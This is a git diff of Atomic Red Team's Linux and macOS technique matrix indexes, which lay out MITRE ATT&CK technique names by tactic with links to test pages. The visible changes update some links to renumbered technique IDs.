+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | [Local Account](../../T1136.001/T1136.001.md) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
+| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
+| | | | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index 8e86b5dd..702a3db3 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -2,47 +2,52 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1551.003/T1551.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [Browser Extensions](../../T1176/T1176.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
